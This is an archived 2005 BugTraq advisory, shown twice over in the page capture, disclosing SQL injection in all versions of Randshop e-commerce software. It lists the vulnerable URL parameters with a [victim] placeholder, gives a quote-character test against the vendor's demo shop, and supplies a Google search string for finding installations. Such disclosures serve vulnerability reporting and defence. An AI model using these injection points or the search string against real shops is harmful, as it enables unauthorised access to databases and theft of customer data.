BugTraq
Back to list
|
Post reply
Randshop all versiyon Sql İnjection
Nov 28 2005 03:26PM
liz0 bsdmail com
Randshop all versiyon Sql İnjection
Website:http://www.randshop.com
Demo:http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit:Liz0ziM & wannacut Mail:Liz0 (at) bsdmail (dot) com [email concealed] www.biyo.tk
-------------------------------------------------------------------
exploit :
http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]
------------------------------------------------------------------------
--------
eg:
http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=
21'
--------------------------------------------------------------------
Google:intext:"software 2004-2005 by randshop"
http://www.blogcu.com/Liz0ziM/112800/
http://biyo.5gigs.com/randshop.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Website:http://www.randshop.com
Demo:http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit:Liz0ziM & wannacut Mail:Liz0 (at) bsdmail (dot) com [email concealed] www.biyo.tk
-------------------------------------------------------------------
exploit :
http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]
------------------------------------------------------------------------
--------
eg:
http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=
21'
--------------------------------------------------------------------
Google:intext:"software 2004-2005 by randshop"
http://www.blogcu.com/Liz0ziM/112800/
http://biyo.5gigs.com/randshop.txt
[ reply ]